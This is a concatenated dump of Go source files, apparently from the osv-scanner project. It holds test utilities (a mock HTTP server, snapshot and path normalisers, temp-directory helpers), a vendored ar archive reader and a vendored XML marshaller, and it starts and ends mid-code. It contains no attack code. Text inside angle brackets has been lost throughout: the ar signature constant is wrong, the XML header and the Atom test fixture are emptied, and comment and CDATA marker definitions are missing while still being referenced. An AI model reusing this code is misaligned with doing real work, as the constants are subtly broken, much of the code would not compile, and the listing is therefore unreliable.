"subStruct": { "subitems": [ "original value 3", "original value 4" ] } } ] }`, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got := ReplaceJSONInput(t, tt.args.jsonInput, tt.args.path, tt.args.matcher) if !gjson.Valid(got) { t.Fatalf("Output not valid: \n%s", got) } if !gjson.Valid(tt.want) { t.Fatalf("Want field is not valid JSON: \n%s", tt.want) } var wantPretty bytes.Buffer var gotPretty bytes.Buffer _ = json.Indent(&wantPretty, []byte(tt.want), "", "\t") _ = json.Indent(&gotPretty, []byte(got), "", "\t") if diff := cmp.Diff(wantPretty.String(), gotPretty.String()); diff != "" { t.Errorf("ReplaceJSONInput() diff (-want +got): %s", diff) } }) } } ================================================ FILE: internal/testutility/mock_http.go ================================================ package testutility import ( "log" "net/http" "net/http/httptest" "os" "strings" "sync" "testing" ) type MockHTTPServer struct { *httptest.Server mu sync.Mutex response map[string][]byte // path -> response authorization string // expected Authorization header contents } // NewMockHTTPServer starts and returns a new simple HTTP Server for mocking basic requests. // The Server will automatically be shut down with Close() in the test Cleanup function. // // Use the SetResponse / SetResponseFromFile to set the responses for specific URL paths. func NewMockHTTPServer(t *testing.T) *MockHTTPServer { t.Helper() mock := &MockHTTPServer{response: make(map[string][]byte)} mock.Server = httptest.NewServer(mock) t.Cleanup(func() { mock.Close() }) return mock } // SetResponse sets the Server's response for the URL path to be response bytes. func (m *MockHTTPServer) SetResponse(t *testing.T, path string, response []byte) { t.Helper() m.mu.Lock() defer m.mu.Unlock() path = strings.TrimPrefix(path, "/") m.response[path] = response } // SetResponseFromFile sets the Server's response for the URL path to be the contents of the file at filename. func (m *MockHTTPServer) SetResponseFromFile(t *testing.T, path string, filename string) { t.Helper() b, err := os.ReadFile(filename) if err != nil { t.Fatalf("failed to read response file: %v", err) } m.SetResponse(t, path, b) } // SetAuthorization sets the contents of the 'Authorization' header the server expects for all endpoints. // // The incoming requests' headers must match the auth string exactly, otherwise the server will respond with 401 Unauthorized. // If authorization is unset or empty, the server will not require authorization. func (m *MockHTTPServer) SetAuthorization(t *testing.T, auth string) { t.Helper() m.mu.Lock() defer m.mu.Unlock() m.authorization = auth } // ServeHTTP is the http.Handler for the underlying httptest.Server. func (m *MockHTTPServer) ServeHTTP(w http.ResponseWriter, r *http.Request) { m.mu.Lock() wantAuth := m.authorization resp, ok := m.response[strings.TrimPrefix(r.URL.EscapedPath(), "/")] m.mu.Unlock() if wantAuth != "" && r.Header.Get("Authorization") != wantAuth { w.WriteHeader(http.StatusUnauthorized) resp = []byte("unauthorized") } else if !ok { w.WriteHeader(http.StatusNotFound) resp = []byte("not found") } if _, err := w.Write(resp); err != nil { log.Fatalf("Write: %v", err) } } ================================================ FILE: internal/testutility/normalize.go ================================================ package testutility import ( "bufio" "os" "path/filepath" "regexp" "runtime" "strings" "testing" "github.com/google/osv-scanner/v2/internal/cachedregexp" ) // normalizeFilePathsOnOutput tries to ensure lines in the given `output` are // less than 250 characters by normalizing any file paths that are present func normalizeFilePathsOnOutput(t *testing.T, output string) string { t.Helper() builder := strings.Builder{} scanner := bufio.NewScanner(strings.NewReader(output)) for scanner.Scan() { text := scanner.Text() if len(text) <= 250 { text = normalizeFilePaths(t, text) } // Always replace \\ because it could be in a long SARIF/JSON output text = strings.ReplaceAll(text, "\\\\", "/") builder.WriteString(text) builder.WriteString("\n") } // Match ending new line if strings.HasSuffix(output, "\n") { return builder.String() } return strings.TrimSuffix(builder.String(), "\n") } // normalizeFilePaths attempts to normalize any file paths in the given `output` // so that they can be compared reliably regardless of the file path separator // being used. // // Namely, escaped forward slashes are replaced with backslashes. func normalizeFilePaths(t *testing.T, output string) string { t.Helper() return strings.ReplaceAll(strings.ReplaceAll(output, "\\\\", "/"), "\\", "/") } // normalizeRootDirectory attempts to replace references to the current working // directory with "", in order to reduce the noise of the cmp diff func normalizeRootDirectory(t *testing.T, str string) string { t.Helper() cwd := normalizeFilePaths(t, GetCurrentWorkingDirectory(t)) // file uris with Windows end up with three slashes, so we normalize that too str = strings.ReplaceAll(str, "file:///"+cwd, "file://") str = strings.ReplaceAll(str, cwd, "") // Replace versions without the root as well str = strings.ReplaceAll(str, pathWithoutRoot(t, cwd), "") return str } // normalizeUserCacheDirectory attempts to replace references to the current working // directory with "", in order to reduce the noise of the cmp diff func normalizeUserCacheDirectory(t *testing.T, str string) string { t.Helper() cacheDir, err := os.UserCacheDir() if err != nil { t.Errorf("could not get user cache (%v) - results and diff might be inaccurate!", err) } cacheDir = normalizeFilePaths(t, cacheDir) // file uris with Windows end up with three slashes, so we normalize that too str = strings.ReplaceAll(str, "file:///"+cacheDir, "file://") return strings.ReplaceAll(str, cacheDir, "") } // normalizeTempDirectory attempts to replace references to the temp directory // with "", to ensure tests pass across different OSs func normalizeTempDirectory(t *testing.T, str string) string { t.Helper() //nolint:gocritic // ensure that the directory doesn't end with a trailing slash tempDir := normalizeFilePaths(t, filepath.Join(os.TempDir())) re := cachedregexp.MustCompile(regexp.QuoteMeta(tempDir+`/osv-scanner-test-`) + `\d+`) str = re.ReplaceAllString(str, "") // Replace versions without the root as well re = cachedregexp.MustCompile(regexp.QuoteMeta(pathWithoutRoot(t, tempDir)+`/osv-scanner-test-`) + `\d+`) return re.ReplaceAllString(str, "") } // normalizeErrors attempts to replace error messages on alternative OSs with their // known linux equivalents, to ensure tests pass across different OSs func normalizeErrors(t *testing.T, str string) string { t.Helper() str = strings.ReplaceAll(str, "The filename, directory name, or volume label syntax is incorrect.", "no such file or directory") str = strings.ReplaceAll(str, "The system cannot find the path specified.", "no such file or directory") str = strings.ReplaceAll(str, "The system cannot find the file specified.", "no such file or directory") str = strings.ReplaceAll(str, "CreateFile", "lstat") str = strings.ReplaceAll(str, "\nstat ./testdata/", "\nlstat ./testdata/") str = strings.ReplaceAll(str, "GetFileAttributesEx", "stat") return str } // removeUntestableLines remove some lines from the output that are not testable func removeUntestableLines(t *testing.T, str string) string { t.Helper() replacer := regexp.MustCompile(`Image not found locally, pulling docker image .*\.\.\.\n`) str = replacer.ReplaceAllLiteralString(str, "") return str } // normalizeSnapshot applies a series of normalizes to the buffer from a std stream like stdout and stderr func normalizeSnapshot(t *testing.T, str string) string { t.Helper() for _, normalizer := range []func(t *testing.T, str string) string{ normalizeFilePathsOnOutput, normalizeRootDirectory, normalizeTempDirectory, normalizeUserCacheDirectory, normalizeErrors, removeUntestableLines, } { str = normalizer(t, str) } return str } func pathWithoutRoot(t *testing.T, str string) string { t.Helper() // Replace versions without the root as well var root string if runtime.GOOS == "windows" { root = filepath.VolumeName(str) + "\\" } if strings.HasPrefix(str, "/") { root = "/" } return str[len(root):] } ================================================ FILE: internal/testutility/snapshot.go ================================================ package testutility import ( "encoding/json" "testing" "github.com/gkampitakis/go-snaps/snaps" ) type Snapshot struct { windowsReplacements map[string]string } // NewSnapshot creates a snapshot that can be passed around within tests func NewSnapshot() Snapshot { return Snapshot{windowsReplacements: map[string]string{}} } // WithWindowsReplacements adds a map of strings with values that they should be // replaced within before comparing the snapshot when running on Windows func (s Snapshot) WithWindowsReplacements(replacements map[string]string) Snapshot { s.windowsReplacements = replacements return s } // WithCRLFReplacement adds a Windows replacement for "\r\n" to "\n". // This should be called after WithWindowsReplacements if used together. func (s Snapshot) WithCRLFReplacement() Snapshot { s.windowsReplacements["\r\n"] = "\n" return s } // MatchJSON asserts the existing snapshot matches what was gotten in the test, // after being marshalled as JSON func (s Snapshot) MatchJSON(t *testing.T, got any) { t.Helper() j, err := json.MarshalIndent(got, "", " ") if err != nil { t.Fatalf("Failed to marshal JSON: %s", err) } snaps.MatchSnapshot(t, normalizeRootDirectory(t, applyWindowsReplacements(string(j), s.windowsReplacements))) } // MatchText asserts the existing snapshot matches what was gotten in the test func (s Snapshot) MatchText(t *testing.T, got string) { t.Helper() snaps.MatchSnapshot(t, normalizeSnapshot(t, applyWindowsReplacements(got, s.windowsReplacements))) } ================================================ FILE: internal/testutility/utility.go ================================================ package testutility import ( "flag" "fmt" "math/rand" "os" "path/filepath" "runtime" "strings" "testing" "github.com/gkampitakis/go-snaps/snaps" ) // GetCurrentWorkingDirectory returns the current working directory, raising // a fatal error if it cannot be retrieved for some reason func GetCurrentWorkingDirectory(t *testing.T) string { t.Helper() dir, err := os.Getwd() if err != nil { t.Fatalf("failed to get current directory: %v", err) } return dir } // applyWindowsReplacements will replace any matching strings if on Windows func applyWindowsReplacements(content string, replacements map[string]string) string { if runtime.GOOS == "windows" { for match, replacement := range replacements { content = strings.ReplaceAll(content, match, replacement) } } return content } // CleanSnapshots ensures that snapshots are relevant and sorted for consistency func CleanSnapshots(m *testing.M) { dirty, err := snaps.Clean(m, snaps.CleanOpts{Sort: true}) if err != nil { fmt.Println("Error cleaning snaps:", err) os.Exit(1) } if dirty { fmt.Println("Some snapshots were outdated.") os.Exit(1) } } // Skip is equivalent to t.Log followed by t.SkipNow, but allows tracking of // what snapshots are skipped so that they're not marked as obsolete func Skip(t *testing.T, args ...any) { t.Helper() snaps.Skip(t, args...) } // isThisTestRunTarget tries to determine if the currently running test has been // targeted with the -run flag, by comparing the flags value to [testing.T.Name] // // Since this just does a direct comparison, it will not match for regex patterns func isThisTestRunTarget(t *testing.T) bool { t.Helper() runOnly, _, _ := strings.Cut(flag.Lookup("test.run").Value.String(), "/") runOnlyWithNoRegex := strings.Trim(runOnly, "^$") return runOnly == t.Name() || runOnlyWithNoRegex == t.Name() } // IsAcceptanceTesting returns true if the test suite is being run with acceptance tests enabled func IsAcceptanceTesting() bool { return os.Getenv("TEST_ACCEPTANCE") == "true" } // SkipIfNotAcceptanceTesting marks the test as skipped unless the test suite is // being run with acceptance tests enabled, as indicated by IsAcceptanceTesting, // or the test is being run specifically with the -run flag // This is used to skip tests that could require external dependencies other than go func SkipIfNotAcceptanceTesting(t *testing.T, reason string) { t.Helper() if !IsAcceptanceTesting() && !isThisTestRunTarget(t) { Skip(t, "Skipping extended test: ", reason) } } // SkipIfShort marks the test as skipped if the short flag is set // or the test is being run specifically with the -run flag func SkipIfShort(t *testing.T) { t.Helper() if testing.Short() && !isThisTestRunTarget(t) { Skip(t, "Skipping long test: ", "Takes a while to run") } } func ValueIfOnWindows(win, or string) string { if runtime.GOOS == "windows" { return win } return or } func fixedLengthTempDir(parent string) (string, error) { n := rand.Int63n(1_000_000_000_000) //nolint:gosec // 10^12 suffix := fmt.Sprintf("%0*d", 12, n) name := "osv-scanner-test-" + suffix path := filepath.Join(parent, name) return path, os.Mkdir(path, 0o700) } // CreateTestDir makes a temporary directory for use in testing that involves // writing and reading files from disk, which is automatically cleaned up // when testing finishes func CreateTestDir(t *testing.T) string { t.Helper() p, err := fixedLengthTempDir(os.TempDir()) if err != nil { t.Fatalf("could not create test directory: %v", err) } // ensure the test directory is removed when we're done testing t.Cleanup(func() { _ = os.RemoveAll(p) }) return p } ================================================ FILE: internal/thirdparty/ar/COPYING ================================================ Copyright (c) 2013 Blake Smith Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: internal/thirdparty/ar/reader.go ================================================ // Copyright (c) 2013 Blake Smith // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. // Modified under Apache License package ar import ( "bytes" "errors" "io" "strconv" "strings" ) const ( HeaderByteSize = 60 ArSignature = "!\n" ) type Header struct { Name string Size int } type slicer []byte func (sp *slicer) next(n int) []byte { s := *sp b := s[0:n] *sp = s[n:] return b } // Provides read access to an ar archive. // Call next to skip files // // Example: // reader := NewReader(f) // var buf bytes.Buffer // for { // _, err := reader.Next() // if err == io.EOF { // break // } // if err != nil { // t.Errorf(err.Error()) // } // io.Copy(&buf, reader) // } type Reader struct { r io.Reader bytesToRead int pad int } // Copies read data to r. Strips the global ar header. func NewReader(r io.Reader) (*Reader, error) { sigBuf := bytes.Buffer{} _, _ = io.CopyN(&sigBuf, r, 8) // Discard global header if sigBuf.String() != ArSignature { return nil, errors.New("not an rlib archive") } return &Reader{r: r}, nil } // Call Next() to skip to the next file in the archive file. // Returns a Header which contains the metadata about the // file in the archive. func (rd *Reader) Next() (*Header, error) { err := rd.skipUnread() if err != nil { return nil, err } return rd.readHeader() } // Read data from the current entry in the archive. func (rd *Reader) Read(b []byte) (n int, err error) { if rd.bytesToRead == 0 { return 0, io.EOF } if len(b) > rd.bytesToRead { b = b[0:rd.bytesToRead] } n, err = rd.r.Read(b) rd.bytesToRead -= n return } func (rd *Reader) skipUnread() error { bytesToSkip := int64(rd.bytesToRead + rd.pad) rd.bytesToRead, rd.pad = 0, 0 if seeker, ok := rd.r.(io.Seeker); ok { _, err := seeker.Seek(bytesToSkip, io.SeekCurrent) return err } _, err := io.CopyN(io.Discard, rd.r, bytesToSkip) return err } func (rd *Reader) readHeader() (*Header, error) { headerBuf := make([]byte, HeaderByteSize) if _, err := io.ReadFull(rd.r, headerBuf); err != nil { return nil, err } header := new(Header) s := slicer(headerBuf) header.Name = byteToString(s.next(16)) // Skip the next 4 fields, we only need name and size s.next(12 + 6 + 6 + 8) header.Size = byteToDecimal(s.next(10)) rd.bytesToRead = header.Size rd.pad = header.Size % 2 return header, nil } func byteToString(b []byte) string { return strings.TrimRight(string(b), " ") } func byteToDecimal(b []byte) int { n, _ := strconv.Atoi(byteToString(b)) return n } ================================================ FILE: internal/thirdparty/xml/atom_test.go ================================================ // Copyright 2011 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package xml import "time" var atomValue = &Feed{ XMLName: Name{"http://www.w3.org/2005/Atom", "feed"}, Title: "Example Feed", Link: []Link{{Href: "http://example.org/"}}, Updated: ParseTime("2003-12-13T18:30:02Z"), Author: Person{Name: "John Doe"}, ID: "urn:uuid:60a76c80-d399-11d9-b93C-0003939e0af6", Entry: []Entry{ { Title: "Atom-Powered Robots Run Amok", Link: []Link{{Href: "http://example.org/2003/12/13/atom03"}}, ID: "urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a", Updated: ParseTime("2003-12-13T18:30:02Z"), Summary: NewText("Some text."), }, }, } var atomXML = `` + `` + `Example Feed` + `urn:uuid:60a76c80-d399-11d9-b93C-0003939e0af6` + `` + `John Doe` + `` + `Atom-Powered Robots Run Amok` + `urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a` + `` + `2003-12-13T18:30:02Z` + `` + `Some text.` + `` + `` func ParseTime(str string) time.Time { t, err := time.Parse(time.RFC3339, str) if err != nil { panic(err) } return t } func NewText(text string) Text { return Text{ Body: text, } } ================================================ FILE: internal/thirdparty/xml/marshal.go ================================================ // Copyright 2011 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package xml import ( "bufio" "bytes" "encoding" "errors" "fmt" "io" "reflect" "strconv" "strings" ) const ( // Header is a generic XML header suitable for use with the output of [Marshal]. // This is not automatically added to any output of this package, // it is provided as a convenience. Header = `` + "\n" ) // Marshal returns the XML encoding of v. // // Marshal handles an array or slice by marshaling each of the elements. // Marshal handles a pointer by marshaling the value it points at or, if the // pointer is nil, by writing nothing. Marshal handles an interface value by // marshaling the value it contains or, if the interface value is nil, by // writing nothing. Marshal handles all other data by writing one or more XML // elements containing the data. // // The name for the XML elements is taken from, in order of preference: // - the tag on the XMLName field, if the data is a struct // - the value of the XMLName field of type [Name] // - the tag of the struct field used to obtain the data // - the name of the struct field used to obtain the data // - the name of the marshaled type // // The XML element for a struct contains marshaled elements for each of the // exported fields of the struct, with these exceptions: // - the XMLName field, described above, is omitted. // - a field with tag "-" is omitted. // - a field with tag "name,attr" becomes an attribute with // the given name in the XML element. // - a field with tag ",attr" becomes an attribute with the // field name in the XML element. // - a field with tag ",chardata" is written as character data, // not as an XML element. // - a field with tag ",cdata" is written as character data // wrapped in one or more tags, not as an XML element. // - a field with tag ",innerxml" is written verbatim, not subject // to the usual marshaling procedure. // - a field with tag ",comment" is written as an XML comment, not // subject to the usual marshaling procedure. It must not contain // the "--" string within it. // - a field with a tag including the "omitempty" option is omitted // if the field value is empty. The empty values are false, 0, any // nil pointer or interface value, and any array, slice, map, or // string of length zero. // - an anonymous struct field is handled as if the fields of its // value were part of the outer struct. // - a field implementing [Marshaler] is written by calling its MarshalXML // method. // - a field implementing [encoding.TextMarshaler] is written by encoding the // result of its MarshalText method as text. // // If a field uses a tag "a>b>c", then the element c will be nested inside // parent elements a and b. Fields that appear next to each other that name // the same parent will be enclosed in one XML element. // // If the XML name for a struct field is defined by both the field tag and the // struct's XMLName field, the names must match. // // See [MarshalIndent] for an example. // // Marshal will return an error if asked to marshal a channel, function, or map. func Marshal(v any) ([]byte, error) { var b bytes.Buffer enc := NewEncoder(&b) if err := enc.Encode(v); err != nil { return nil, err } if err := enc.Close(); err != nil { return nil, err } return b.Bytes(), nil } // Marshaler is the interface implemented by objects that can marshal // themselves into valid XML elements. // // MarshalXML encodes the receiver as zero or more XML elements. // By convention, arrays or slices are typically encoded as a sequence // of elements, one per entry. // Using start as the element tag is not required, but doing so // will enable [Unmarshal] to match the XML elements to the correct // struct field. // One common implementation strategy is to construct a separate // value with a layout corresponding to the desired XML and then // to encode it using e.EncodeElement. // Another common strategy is to use repeated calls to e.EncodeToken // to generate the XML output one token at a time. // The sequence of encoded tokens must make up zero or more valid // XML elements. type Marshaler interface { MarshalXML(e *Encoder, start StartElement) error } // MarshalerAttr is the interface implemented by objects that can marshal // themselves into valid XML attributes. // // MarshalXMLAttr returns an XML attribute with the encoded value of the receiver. // Using name as the attribute name is not required, but doing so // will enable [Unmarshal] to match the attribute to the correct // struct field. // If MarshalXMLAttr returns the zero attribute [Attr]{}, no attribute // will be generated in the output. // MarshalXMLAttr is used only for struct fields with the // "attr" option in the field tag. type MarshalerAttr interface { MarshalXMLAttr(name Name) (Attr, error) } // MarshalIndent works like [Marshal], but each XML element begins on a new // indented line that starts with prefix and is followed by one or more // copies of indent according to the nesting depth. func MarshalIndent(v any, prefix, indent string) ([]byte, error) { var b bytes.Buffer enc := NewEncoder(&b) enc.Indent(prefix, indent) if err := enc.Encode(v); err != nil { return nil, err } if err := enc.Close(); err != nil { return nil, err } return b.Bytes(), nil } // An Encoder writes XML data to an output stream. type Encoder struct { p printer } // NewEncoder returns a new encoder that writes to w. func NewEncoder(w io.Writer) *Encoder { e := &Encoder{printer{w: bufio.NewWriter(w)}} e.p.encoder = e return e } // Indent sets the encoder to generate XML in which each element // begins on a new indented line that starts with prefix and is followed by // one or more copies of indent according to the nesting depth. func (enc *Encoder) Indent(prefix, indent string) { enc.p.prefix = prefix enc.p.indent = indent } // Encode writes the XML encoding of v to the stream. // // See the documentation for [Marshal] for details about the conversion // of Go values to XML. // // Encode calls [Encoder.Flush] before returning. func (enc *Encoder) Encode(v any) error { err := enc.p.marshalValue(reflect.ValueOf(v), nil, nil) if err != nil { return err } return enc.p.w.Flush() } // EncodeElement writes the XML encoding of v to the stream, // using start as the outermost tag in the encoding. // // See the documentation for [Marshal] for details about the conversion // of Go values to XML. // // EncodeElement calls [Encoder.Flush] before returning. func (enc *Encoder) EncodeElement(v any, start StartElement) error { err := enc.p.marshalValue(reflect.ValueOf(v), nil, &start) if err != nil { return err } return enc.p.w.Flush() } var ( begComment = []byte("") endProcInst = []byte("?>") ) // EncodeToken writes the given XML token to the stream. // It returns an error if [StartElement] and [EndElement] tokens are not properly matched. // // EncodeToken does not call [Encoder.Flush], because usually it is part of a larger operation // such as [Encoder.Encode] or [Encoder.EncodeElement] (or a custom [Marshaler]'s MarshalXML invoked // during those), and those will call Flush when finished. // Callers that create an Encoder and then invoke EncodeToken directly, without // using Encode or EncodeElement, need to call Flush when finished to ensure // that the XML is written to the underlying writer. // // EncodeToken allows writing a [ProcInst] with Target set to "xml" only as the first token // in the stream. func (enc *Encoder) EncodeToken(t Token) error { p := &enc.p switch t := t.(type) { case StartElement: if err := p.writeStart(&t); err != nil { return err } case EndElement: if err := p.writeEnd(t.Name, t.Empty); err != nil { return err } case CharData: if t.cdata { p.Write(cdataStart) } if t.origin != nil { // Write the original text if there are escape sequences replaced. p.Write(t.origin) } else { escapeText(p, t.data, false) } if t.cdata { p.Write(cdataEnd) } case Comment: if bytes.Contains(t, endComment) { return fmt.Errorf("xml: EncodeToken of Comment containing --> marker") } p.WriteString("") return p.cachedWriteError() case ProcInst: // First token to be encoded which is also a ProcInst with target of xml // is the xml declaration. The only ProcInst where target of xml is allowed. if t.Target == "xml" && p.w.Buffered() != 0 { return fmt.Errorf("xml: EncodeToken of ProcInst xml target only valid for xml declaration, first token encoded") } if !isNameString(t.Target) { return fmt.Errorf("xml: EncodeToken of ProcInst with invalid Target") } if bytes.Contains(t.Inst, endProcInst) { return fmt.Errorf("xml: EncodeToken of ProcInst containing ?> marker") } p.WriteString(" 0 { p.WriteByte(' ') p.Write(t.Inst) } p.WriteString("?>") case Directive: if !isValidDirective(t) { return fmt.Errorf("xml: EncodeToken of Directive containing wrong < or > markers") } p.WriteString("") default: return fmt.Errorf("xml: EncodeToken of invalid token type") } return p.cachedWriteError() } // isValidDirective reports whether dir is a valid directive text, // meaning angle brackets are matched, ignoring comments and strings. func isValidDirective(dir Directive) bool { var ( depth int inquote uint8 incomment bool ) for i, c := range dir { switch { case incomment: if c == '>' { if n := 1 + i - len(endComment); n >= 0 && bytes.Equal(dir[n:i+1], endComment) { incomment = false } } // Just ignore anything in comment case inquote != 0: if c == inquote { inquote = 0 } // Just ignore anything within quotes case c == '\'' || c == '"': inquote = c case c == '<': if i+len(begComment) < len(dir) && bytes.Equal(dir[i:i+len(begComment)], begComment) { incomment = true } else { depth++ } case c == '>': if depth == 0 { return false } depth-- } } return depth == 0 && inquote == 0 && !incomment } // Flush flushes any buffered XML to the underlying writer. // See the [Encoder.EncodeToken] documentation for details about when it is necessary. func (enc *Encoder) Flush() error { return enc.p.w.Flush() } // Close the Encoder, indicating that no more data will be written. It flushes // any buffered XML to the underlying writer and returns an error if the // written XML is invalid (e.g. by containing unclosed elements). func (enc *Encoder) Close() error { return enc.p.Close() } type printer struct { w *bufio.Writer encoder *Encoder seq int indent string prefix string depth int indentedIn bool putNewline bool attrNS map[string]string // map prefix -> name space attrPrefix map[string]string // map name space -> prefix prefixes []string tags []Name closed bool err error } // createAttrPrefix finds the name space prefix attribute to use for the given name space, // defining a new prefix if necessary. It returns the prefix. func (p *printer) createAttrPrefix(url string) string { if prefix := p.attrPrefix[url]; prefix != "" { return prefix } // The "http://www.w3.org/XML/1998/namespace" name space is predefined as "xml" // and must be referred to that way. // (The "http://www.w3.org/2000/xmlns/" name space is also predefined as "xmlns", // but users should not be trying to use that one directly - that's our job.) if url == xmlURL { return xmlPrefix } // Need to define a new name space. if p.attrPrefix == nil { p.attrPrefix = make(map[string]string) p.attrNS = make(map[string]string) } // Pick a name. We try to use the final element of the path // but fall back to _. prefix := strings.TrimRight(url, "/") if i := strings.LastIndex(prefix, "/"); i >= 0 { prefix = prefix[i+1:] } if prefix == "" || !isName([]byte(prefix)) || strings.Contains(prefix, ":") { prefix = "_" } // xmlanything is reserved and any variant of it regardless of // case should be matched, so: // (('X'|'x') ('M'|'m') ('L'|'l')) // See Section 2.3 of https://www.w3.org/TR/REC-xml/ if len(prefix) >= 3 && strings.EqualFold(prefix[:3], "xml") { prefix = "_" + prefix } if p.attrNS[prefix] != "" { // Name is taken. Find a better one. for p.seq++; ; p.seq++ { if id := prefix + "_" + strconv.Itoa(p.seq); p.attrNS[id] == "" { prefix = id break } } } p.attrPrefix[url] = prefix p.attrNS[prefix] = url p.WriteString(`xmlns:`) p.WriteString(prefix) p.WriteString(`="`) EscapeText(p, []byte(url)) p.WriteString(`" `) p.prefixes = append(p.prefixes, prefix) return prefix } // deleteAttrPrefix removes an attribute name space prefix. func (p *printer) deleteAttrPrefix(prefix string) { delete(p.attrPrefix, p.attrNS[prefix]) delete(p.attrNS, prefix) } func (p *printer) markPrefix() { p.prefixes = append(p.prefixes, "") } func (p *printer) popPrefix() { for len(p.prefixes) > 0 { prefix := p.prefixes[len(p.prefixes)-1] p.prefixes = p.prefixes[:len(p.prefixes)-1] if prefix == "" { break } p.deleteAttrPrefix(prefix) } } var ( marshalerType = reflect.TypeFor[Marshaler]() marshalerAttrType = reflect.TypeFor[MarshalerAttr]() textMarshalerType = reflect.TypeFor[encoding.TextMarshaler]() ) // marshalValue writes one or more XML elements representing val. // If val was obtained from a struct field, finfo must have its details. func (p *printer) marshalValue(val reflect.Value, finfo *fieldInfo, startTemplate *StartElement) error { if startTemplate != nil && startTemplate.Name.Local == "" { return fmt.Errorf("xml: EncodeElement of StartElement with missing name") } if !val.IsValid() { return nil } if finfo != nil && finfo.flags&fOmitEmpty != 0 && isEmptyValue(val) { return nil } // Drill into interfaces and pointers. // This can turn into an infinite loop given a cyclic chain, // but it matches the Go 1 behavior. for val.Kind() == reflect.Interface || val.Kind() == reflect.Pointer { if val.IsNil() { return nil } val = val.Elem() } kind := val.Kind() typ := val.Type() // Check for marshaler. if val.CanInterface() && typ.Implements(marshalerType) { return p.marshalInterface(val.Interface().(Marshaler), defaultStart(typ, finfo, startTemplate)) } if val.CanAddr() { pv := val.Addr() if pv.CanInterface() && pv.Type().Implements(marshalerType) { return p.marshalInterface(pv.Interface().(Marshaler), defaultStart(pv.Type(), finfo, startTemplate)) } } // Check for text marshaler. if val.CanInterface() && typ.Implements(textMarshalerType) { return p.marshalTextInterface(val.Interface().(encoding.TextMarshaler), defaultStart(typ, finfo, startTemplate)) } if val.CanAddr() { pv := val.Addr() if pv.CanInterface() && pv.Type().Implements(textMarshalerType) { return p.marshalTextInterface(pv.Interface().(encoding.TextMarshaler), defaultStart(pv.Type(), finfo, startTemplate)) } } // Slices and arrays iterate over the elements. They do not have an enclosing tag. if (kind == reflect.Slice || kind == reflect.Array) && typ.Elem().Kind() != reflect.Uint8 { for i, n := 0, val.Len(); i < n; i++ { if err := p.marshalValue(val.Index(i), finfo, startTemplate); err != nil { return err } } return nil } tinfo, err := getTypeInfo(typ) if err != nil { return err } // Create start element. // Precedence for the XML element name is: // 0. startTemplate // 1. XMLName field in underlying struct; // 2. field name/tag in the struct field; and // 3. type name var start StartElement if startTemplate != nil { start.Name = startTemplate.Name start.Attr = append(start.Attr, startTemplate.Attr...) start.Empty = startTemplate.Empty } else if tinfo.xmlname != nil { xmlname := tinfo.xmlname if xmlname.name != "" { start.Name.Space, start.Name.Local = xmlname.xmlns, xmlname.name } else { fv := xmlname.value(val, dontInitNilPointers) if v, ok := fv.Interface().(Name); ok && v.Local != "" { start.Name = v } } } if start.Name.Local == "" && finfo != nil { start.Name.Space, start.Name.Local = finfo.xmlns, finfo.name } if start.Name.Local == "" { name := typ.Name() if i := strings.IndexByte(name, '['); i >= 0 { // Truncate generic instantiation name. See issue 48318. name = name[:i] } if name == "" { return &UnsupportedTypeError{typ} } start.Name.Local = name } // Attributes for i := range tinfo.fields { finfo := &tinfo.fields[i] if finfo.flags&fAttr == 0 { continue } fv := finfo.value(val, dontInitNilPointers) if finfo.flags&fOmitEmpty != 0 && (!fv.IsValid() || isEmptyValue(fv)) { continue } if fv.Kind() == reflect.Interface && fv.IsNil() { continue } name := Name{Space: finfo.xmlns, Local: finfo.name} if err := p.marshalAttr(&start, name, fv); err != nil { return err } } // If an empty name was found, namespace is overridden with an empty space if tinfo.xmlname != nil && start.Name.Space == "" && tinfo.xmlname.xmlns == "" && tinfo.xmlname.name == "" && len(p.tags) != 0 && p.tags[len(p.tags)-1].Space != "" { start.Attr = append(start.Attr, Attr{Name{"", xmlnsPrefix}, "", ""}) } if err := p.writeStart(&start); err != nil { return err } if val.Kind() == reflect.Struct { err = p.marshalStruct(tinfo, val) } else { s, b, err1 := p.marshalSimple(typ, val) if err1 != nil { err = err1 } else if b != nil { EscapeText(p, b) } else { p.EscapeString(s, false) } } if err != nil { return err } if err := p.writeEnd(start.Name, start.Empty); err != nil { return err } return p.cachedWriteError() } // marshalAttr marshals an attribute with the given name and value, adding to start.Attr. func (p *printer) marshalAttr(start 